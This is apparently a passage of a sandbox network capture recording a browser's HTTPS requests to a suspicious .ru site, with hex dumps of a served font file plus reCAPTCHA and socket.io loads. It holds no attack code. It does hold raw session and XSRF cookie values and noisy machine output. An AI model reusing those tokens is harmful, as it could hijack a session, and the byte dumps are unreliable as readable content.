                                                                                                                          2024-04-17 00:34:49 UTC578INData Raw: c9 a5 3f 68 06 28 7d 56 a1 8c a5 72 1e 4a b3 11 6f 3c e7 50 75 98 b7 36 e5 73 10 05 8b 18 6e c9 9e 2d fa af 75 35 f9 fd 31 ba 78 53 2f 17 a7 4a dd 57 86 ad 2c 7b aa b9 69 7d c4 95 52 ed 35 e0 9c 6d ae ba 81 32 02 3c 8f 52 7e dd 99 30 63 82 3b 45 ec 72 c5 8b f9 72 b1 5a ae 59 c0 f6 20 79 e9 22 e2 b1 ce 92 cd 32 93 e2 02 c8 6e e9 23 e8 b0 43 69 8b 41 c0 80 54 b8 1b 3b bc 73 32 24 3c dc a9 94 c8 fd c4 62 cb 69 1a e0 6f 82 ae 79 55 71 5b e8 20 f7 e1 10 fc 2e 89 29 19 ad 45 f6 10 16 12 7c 7b a9 ae e7 89 03 39 7c 32 4f 25 b8 b1 a6 79 4b 84 ec 81 38 13 20 4f dd db 92 0a 82 ab 02 5f f7 76 1d b5 70 ff 5a 4b 61 e9 9a f0 b4 c9 a7 65 19 99 eb d2 ff cc 5a 1d d5 ad 3d a9 dc d7 3f d7 04 87 47 ae d8 83 2a ec 4b 7a 32 cf 40 de 17 24 b5 27 3d fc 70 e1 7d f8 26 a9 fd b4 70
                                                                                                                          Data Ascii: ?h(}VrJo<Pu6sn-u51xS/JW,{i}R5m2<R~0c;ErrZY y"2n#CiAT;s2$<bioyUq[ .)E|{9|2O%yK8 O_vpZKaeZ=?G*Kz2@$'=p}&p


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.449781104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1413OUTGET /23IwflouldIy5KfULABLPv90jLWsGG8fJ1vw67 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:49 UTC735INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:49 GMT
                                                                                                                          Content-Type: font/woff
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="23IwflouldIy5KfULABLPv90jLWsGG8fJ1vw67"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PZ4vW3KKVVQZBt3aRkfJo%2BjQwKguuD0LgbaRYGdz1bFMbpWWVQCSTEL4dviBEKp4tmHJseoLHkSwiSIjMCghknckKjB%2B7Fxg6LWFRLKLhf%2BHYBI1fYXg5Cbcwhve4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddfea47b96-ATL
                                                                                                                          2024-04-17 00:34:49 UTC634INData Raw: 33 32 64 38 0d 0a 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00
                                                                                                                          Data Ascii: 32d8wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hhea
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 18 0a b8 c3 ff b0 ff 57 b8 7e 1c f0 9f 6e 4e 3c 78 ce 3f d1 ff ae 7f 7d 6a 6e ea 05 a9 57 a7 0e 4d bd 37 f5 f1 d4 3f a4 be 9c 3a 2d 75 41 6a 51 ea be 34 4a f3 a5 5d 92 76 6d da f0 b4 07 d2 9e 48 7b 26 ed 0d 81 79 81 9c 40 cf c0 83 81 47 03 8f 05 7e 1b 18 17 98 18 d8 12 78 3d f0 56 a0 08 67 0d 3b d0 9b 07 40 81 14 4a a3 6c ca a1 1e 94 47 bd e8 4c ba 90 ee a5 9f 20 67 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56
                                                                                                                          Data Ascii: W~nN<x?}jnWM7?:-uAjQ4J]vmH{&y@G~x=Vg;@JlGL g*Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*V
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 2a bc d1 53 63 a1 e6 d0 10 b4 10 92 b7 75 f9 ed ba bc dc ed c2 dd 2e dc d5 81 42 25 28 91 82 67 6b f0 2c 6c 53 02 fd 2e 91 92 fa 89 f4 1c 7a a8 a9 f5 84 a1 c3 0e d3 cb 5a b4 d1 5d b7 a1 8a f8 a4 c6 42 f0 0e a2 c4 21 69 4b 73 78 0e 5d 21 58 28 d8 95 20 fa 14 29 13 32 65 34 a6 57 ab a5 a8 0d cf 40 fb 6c d0 de ee 73 03 30 68 c0 7b 3e 7d 27 14 ca 17 bd 07 be a8 a9 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23
                                                                                                                          Data Ascii: *Scu.B%(gk,lS.zZ]B!iKsx]!X( )2e4W@ls0h{>}'-:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: e7 98 dc be ac ef bc 4a e8 19 e1 85 3b c5 fc 63 36 fd 3f 39 3a 10 37 f2 f9 43 fe 25 cf e7 67 f4 aa 92 8e 09 ec 88 cb d1 3f f8 d4 2f 78 07 e4 e7 59 de 27 33 7a 51 71 a4 ac 37 7c c9 f3 3a 00 45 9b e0 f7 6b 29 5b e6 e4 eb 78 b6 79 9c 1c d9 99 24 d6 27 e8 59 3b f3 99 f9 05 2b f1 d2 c0 c7 e0 9b 82 b2 d7 aa d6 8c c3 1b f5 0e 4a cf 4c 82 83 b1 89 86 cc 2c 49 c7 f0 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d
                                                                                                                          Data Ascii: J;c6?9:7C%g?/xY'3zQq7|:Ek)[xy$'Y;+JL,IMVd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: da 4e 9f 7e 1c d9 64 c7 62 c6 9e 87 a5 c6 10 6c 66 7d 74 74 ed ec 19 8f 3f ef 6e 76 41 57 a3 b6 45 ad c7 f9 a0 48 9d eb 11 c2 46 8f 37 c2 7e d5 9f c6 d8 b1 07 de 7c 88 e7 f0 b3 12 07 54 bb b3 c0 9a 97 c9 e0 76 03 b4 79 0e a4 7d 2d f4 6b 83 fb 96 ec 64 6a ae 10 6a 96 1a 6c f9 14 34 ab dd 51 39 6c 42 b9 d8 28 8f 07 d2 31 9b 8c 25 6a 63 e3 19 89 16 43 32 a2 ac 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac
                                                                                                                          Data Ascii: N~dblf}tt?nvAWEHF7~|Tvy}-kdjjl4Q9lB(1%jcC2m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFg
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 03 57 c7 81 6b 0c be d7 c9 18 38 f2 7c 48 2b 70 3d fa 73 83 f4 c9 81 1b 05 1e 6c 03 6e 32 70 b3 0b df 77 61 14 dd 42 b7 d2 50 1a 4d 23 c0 eb db e9 6e 1a 09 b8 0b f0 43 3c bb 1b f0 23 e4 17 d0 7d f4 53 fa 19 72 2e a7 fb e9 0a f0 7d 14 ca 8f 40 de 2d f8 1d 89 f3 48 f1 e3 77 e3 ad 3e 38 ff 18 ef f4 c6 59 d7 35 0a 69 b4 bc 3b 1a 4f 74 cd b7 b4 03 23 80 8f 03 a3 a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db
                                                                                                                          Data Ascii: Wk8|H+p=sln2pwaBPM#nC<#}Sr.}@-Hw>8Y5i;Ot#xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:K
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 2a 29 a4 42 34 4a cb 90 f6 4c 08 63 8b 12 c3 60 b4 20 23 86 66 d0 31 46 26 46 06 43 b6 2c 61 8c f5 fb be f6 68 9f 16 4b 66 fa cf 52 a7 3a 75 f4 9e f3 de f7 fe cf 7b ee bd cf b9 ff e7 f7 bc 40 08 65 b3 1e b2 2b 61 31 56 a9 b4 0e 0d 6b 62 6b 0a 89 84 53 8b ab 68 cf 0d f4 21 8e 78 06 31 9c 51 2c 65 05 d9 ac 55 3d 8d 52 b2 8e ea a4 0a 55 ec d4 75 da 3a bd 9d 0f 9c 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18
                                                                                                                          Data Ascii: *)B4JLc` #f1F&FC,ahKfR:u{@e+a1VkbkSh!x1Q,eU=RUu:c!9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 4d da fc 5e bf 3f 7e 69 71 61 f6 3d 33 9f f9 cc 67 3e f3 f9 cc 7c 66 86 c1 cc c3 0c c3 7e c6 de 64 58 46 c9 a8 6e f0 1c 66 70 72 bc 46 a7 d6 45 ab 75 ea 87 d9 9c 91 d7 f0 97 d6 b9 ec cd 91 82 62 36 79 e4 1d 86 61 10 d3 c9 34 a8 da b8 53 8c 8a 89 b1 e8 31 42 0c 2a 65 11 53 82 10 2a 86 af 11 33 9f a0 6a 01 88 2a d4 7e 58 e9 1f 1f ad 44 48 8b 78 bf 68 6e ae 66 24 8e 7d 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4
                                                                                                                          Data Ascii: M^?~iqa=3g>|f~dXFnfprFEub6ya4S1B*eS*3j*~XDHxhnf$}_c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRz
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 19 67 f9 8b 5f 9f 9b 35 eb dc d7 17 e1 73 f6 6c f8 dc f2 cc 1a b3 79 cd 33 5b b6 3c d3 6b 36 f7 3e a3 5e fb 3a 52 1e 38 80 54 3f 5a bb f6 75 e1 9b 03 07 84 af 7f b4 f6 58 c3 7d ef ad 5e fd de 7d 0d b6 4f 51 df 71 b3 a0 cd 9e 40 4e 9c c5 00 72 cc 20 cc a2 46 50 06 36 b5 40 9b ee ed e5 ef eb a5 f5 d6 aa 8d 11 64 ae 92 a6 0c 98 2c f4 c0 07 71 92 20 2a ef 78 d7 b5 cd 45 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6
                                                                                                                          Data Ascii: g_5sly3[<k6>^:R8T?ZuX}^}OQq@Nr FP6@d,q *xEE[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 81 e8 7b c0 af 33 c1 96 42 98 47 4d 74 8e 21 03 8b 48 28 d8 db 30 d0 82 a9 33 15 ec eb e3 ee e6 ea a2 52 32 81 28 50 09 da 0f 45 02 e9 19 66 da 0a 13 52 10 8a 45 57 4a 81 80 f0 ae 25 cb cb 67 f4 89 4e e8 56 ac 6d 6d cf 4c 89 b3 04 94 46 af b0 fe 1c 68 16 aa 96 55 17 6e 4a 40 33 89 57 7a 67 bd 61 75 41 4a 8e 31 ca 92 31 55 31 8b ba a8 c4 9e 12 e6 70 cf 02 bd 11 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3
                                                                                                                          Data Ascii: {3BGMt!H(03R2(PEfREWJ%gNVmmLFhUnJ@3WzgauAJ11U1pLefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.449783172.217.215.1044433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC710OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:48 UTC528INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Expires: Wed, 17 Apr 2024 00:34:48 GMT
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:48 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Content-Security-Policy: frame-ancestors 'self'
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Server: GSE
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-04-17 00:34:48 UTC727INData Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                          Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                          2024-04-17 00:34:48 UTC502INData Raw: 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 72 7a 34 44 76 55 2d 63 59 32 4a 59 43 77 48 53 54 63 6b 30 5f 71 6d 2d 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 65 5a 47 38 65 34 6e 52 70 30 67 45 70 52 42 37 35
                                                                                                                          Data Ascii: cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-eZG8e4nRp0gEpRB75
                                                                                                                          2024-04-17 00:34:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.449782108.156.152.44433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC618OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                                                                                          Host: cdn.socket.io
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://tvi.jqsn.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:48 UTC701INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Content-Length: 45806
                                                                                                                          Connection: close
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=31536000, immutable
                                                                                                                          Content-Disposition: inline; filename="socket.io.min.js"
                                                                                                                          Date: Tue, 16 Apr 2024 19:40:08 GMT
                                                                                                                          ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                                                                                          Server: Vercel
                                                                                                                          Strict-Transport-Security: max-age=63072000
                                                                                                                          X-Vercel-Cache: HIT
                                                                                                                          X-Vercel-Id: iad1::wnxjz-1713296408969-670e28de6495
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 28a153499e6447173f44812ca04c8e96.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: ATL58-P3
                                                                                                                          X-Amz-Cf-Id: Q6Bsay80ViOPAKePa5E0-v6nyK1nE6-NfExHVVvLG2PSmP2LZR4FXw==
                                                                                                                          Age: 630122
